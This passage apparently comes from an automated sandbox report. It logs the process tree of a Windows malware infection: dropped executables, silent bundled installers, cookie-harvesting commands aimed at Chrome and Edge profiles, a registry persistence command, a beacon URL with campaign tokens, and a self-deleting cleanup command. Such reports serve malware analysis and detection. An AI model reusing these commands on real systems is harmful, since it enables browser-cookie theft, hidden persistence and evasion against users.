                                                                                                PID:4492
                                                                                              • C:\Users\Admin\Documents\5vpgJBjyfbnbMk1YeKUgbWC8.exe
                                                                                                "C:\Users\Admin\Documents\5vpgJBjyfbnbMk1YeKUgbWC8.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4612
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 660
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4812
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 716
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4728
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 664
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:4544
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 668
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:2032
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1160
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4212
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1120
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:992
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1112
                                                                                                  3⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4736
                                                                                              • C:\Users\Admin\Documents\Xdb1fFnJhrYC1plDJxt3VPoy.exe
                                                                                                "C:\Users\Admin\Documents\Xdb1fFnJhrYC1plDJxt3VPoy.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4948
                                                                                              • C:\Users\Admin\Documents\yY2qmC4iOLBQc_v9oIAFRu3F.exe
                                                                                                "C:\Users\Admin\Documents\yY2qmC4iOLBQc_v9oIAFRu3F.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:4672
                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4832
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3180
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5912
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    4⤵
                                                                                                      PID:2704
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      4⤵
                                                                                                        PID:2520
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4512
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2188
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6016
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5524
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5356
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 4512 -s 1536
                                                                                                        4⤵
                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                        • Program crash
                                                                                                        PID:1220
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:5040
                                                                                                  • C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe
                                                                                                    "C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:492
                                                                                                  • C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe
                                                                                                    "C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:184
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-6BVRA.tmp\DvMwGNgUky7bXWwCd2_zhu5C.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-6BVRA.tmp\DvMwGNgUky7bXWwCd2_zhu5C.tmp" /SL5="$40266,138429,56832,C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:4372
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-33Q2P.tmp\Setup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-33Q2P.tmp\Setup.exe" /Verysilent
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:4444
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5884
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 752
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:6060
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 776
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:5964
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 800
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:7144
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5952
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-2P2NR.tmp\Inlog.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-2P2NR.tmp\Inlog.tmp" /SL5="$20254,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:5280
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                              7⤵
                                                                                                                PID:7400
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-8GTL4.tmp\Setup.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-8GTL4.tmp\Setup.tmp" /SL5="$4028A,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                  8⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  PID:7664
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                    9⤵
                                                                                                                      PID:5556
                                                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                        10⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        PID:7108
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                      9⤵
                                                                                                                        PID:3508
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                          10⤵
                                                                                                                            PID:3800
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                          9⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          PID:1176
                                                                                                                        • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                          "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                          9⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:8416
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler"
                                                                                                                          9⤵
                                                                                                                            PID:660
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler.exe"
                                                                                                                              10⤵
                                                                                                                                PID:2884
                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  ping localhost -n 4
                                                                                                                                  11⤵
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:8292
                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:6068
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6A3OQ.tmp\WEATHER Manager.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-6A3OQ.tmp\WEATHER Manager.tmp" /SL5="$401DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:5540
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                          7⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Enumerates connected drives
                                                                                                                          • Modifies system certificate store
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:7324
                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                            8⤵
                                                                                                                              PID:8524
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6108
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-U04EQ.tmp\VPN.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-U04EQ.tmp\VPN.tmp" /SL5="$20256,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:5616
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe" /silent /subid=720
                                                                                                                            7⤵
                                                                                                                              PID:7972
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-BQEBS.tmp\Setup.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-BQEBS.tmp\Setup.tmp" /SL5="$30288,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe" /silent /subid=720
                                                                                                                                8⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Modifies registry class
                                                                                                                                • Modifies system certificate store
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:8052
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                  9⤵
                                                                                                                                    PID:8392
                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                      tapinstall.exe remove tap0901
                                                                                                                                      10⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      PID:8436
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                    9⤵
                                                                                                                                      PID:8864
                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                                                        10⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        PID:7732
                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                      9⤵
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:3416
                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                      9⤵
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:2184
                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              PID:5192
                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5360
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                6⤵
                                                                                                                                  PID:6836
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                    7⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:6916
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5560
                                                                                                                                • C:\Users\Admin\AppData\Roaming\5918109.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5918109.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5020
                                                                                                                                • C:\Users\Admin\AppData\Roaming\4164647.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4164647.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                  PID:5744
                                                                                                                                • C:\Users\Admin\AppData\Roaming\4417789.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4417789.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:6320
                                                                                                                                • C:\Users\Admin\AppData\Roaming\4278010.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4278010.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:6240
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                5⤵
                                                                                                                                  PID:5636
                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4520
                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                  5⤵
                                                                                                                                    PID:5420
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-UEE73.tmp\MediaBurner2.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-UEE73.tmp\MediaBurner2.tmp" /SL5="$1030E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:5032
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-RG9UP.tmp\3377047_logo_media.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-RG9UP.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                        7⤵
                                                                                                                                          PID:6276
                                                                                                                                          • C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe
                                                                                                                                            "C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                            8⤵
                                                                                                                                              PID:6208
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-4QFNF.tmp\ultramediaburner.tmp
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-4QFNF.tmp\ultramediaburner.tmp" /SL5="$30294,281924,62464,C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                9⤵
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                PID:7852
                                                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                  10⤵
                                                                                                                                                    PID:7916
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7e-dd116-ba9-f80ac-43521baecbf98\Gaemataeshani.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7e-dd116-ba9-f80ac-43521baecbf98\Gaemataeshani.exe"
                                                                                                                                                8⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                PID:772
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\e8-c9bea-ea6-ed5b1-d27f02c38b513\Miruxatabu.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\e8-c9bea-ea6-ed5b1-d27f02c38b513\Miruxatabu.exe"
                                                                                                                                                8⤵
                                                                                                                                                  PID:3504
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe /eufive & exit
                                                                                                                                                    9⤵
                                                                                                                                                      PID:6836
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe /eufive
                                                                                                                                                        10⤵
                                                                                                                                                          PID:8200
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                        9⤵
                                                                                                                                                          PID:8460
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                            10⤵
                                                                                                                                                              PID:8924
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zqxe0sbg.plp\ufgaa.exe & exit
                                                                                                                                                            9⤵
                                                                                                                                                              PID:8780
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe & exit
                                                                                                                                                              9⤵
                                                                                                                                                                PID:8320
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:4544
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe" -q
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:8600
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe /mixfive & exit
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:8968
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe /mixfive
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:8172
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3di1wj4c.u5s\autosubplayer.exe /S & exit
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:8892
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:6008
                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:6668
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5684
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpDB29_tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tmpDB29_tmp.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:7152
                                                                                                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                      "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:7636
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:4900
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:6256
                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
